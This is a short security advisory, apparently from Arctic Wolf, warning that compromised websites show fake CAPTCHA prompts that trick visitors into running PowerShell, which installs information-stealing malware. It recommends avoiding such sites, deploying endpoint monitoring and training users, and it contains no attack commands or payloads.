Arctic Wolf has recently observed a campaign in which threat actors are compromising widely used websites across various industries and embedding a fake CAPTCHA challenge. When victims visit the site, they are presented with the CAPTCHA challenge or redirected to a site that provides instructions, triggering PowerShell code execution and ultimately leading to the loading of information stealer malware.
Example of a fake CAPTCHA challenge
Some recent examples of cases observed by Arctic Wolf, where websites were compromised and had an embedded fake CAPTCHA challenge, include:
- A popular physical therapy video site, HEP2go.
- Several auto dealership websites.
At this time, Arctic Wolf is unaware of when the compromised websites will be fixed and strongly recommends avoiding websites that present a fake CAPTCHA challenge until the issue is resolved. Legitimate CAPTCHA challenges do not require users to copy a command or output and paste it into the Windows Run dialog box. If the challenge resembles the example above, the website is likely compromised and should not be visited.
Arctic Wolf currently has detections in place that identify malicious PowerShell substrings observed in this campaign and we will continue to notify customers when we identify new instances of this activity through current agent and Sysmon detections.
Recommendations
Avoid Websites That Present Fake CAPTCHA Challenges Indefinitely
At this time, Arctic Wolf strongly recommends avoiding websites that present a fake CAPTCHA challenge, as shown in the example above. This indicates the site is compromised and unsafe to visit. Arctic Wolf cannot currently comment on when or if these compromised websites will become safe to visit again.
Install Arctic Wolf Agent & Sysmon
- Arctic Wolf has implemented MDR detections for post-compromise threat activity associated with this campaign on endpoint devices.
- Arctic Wolf Agent and Sysmon give Arctic Wolf visibility into network and endpoint events needed to identify tools, techniques, and tactics involved in this campaign.
- For instructions on how to install Arctic Wolf Agent, see the below install guides:
- If you have a supported EDR solution deployed in your environment, please configure it for monitoring with Arctic Wolf.
Note: Arctic Wolf recommends following change management best practices for deploying Agent and Sysmon, including testing changes in a testing environment before deploying to production.
Implement Comprehensive Security Awareness Training
Arctic Wolf strongly recommends implementing comprehensive security awareness training campaigns. These initiatives are designed to equip users with the skills needed to quickly identify and report suspicious activities.
Resources
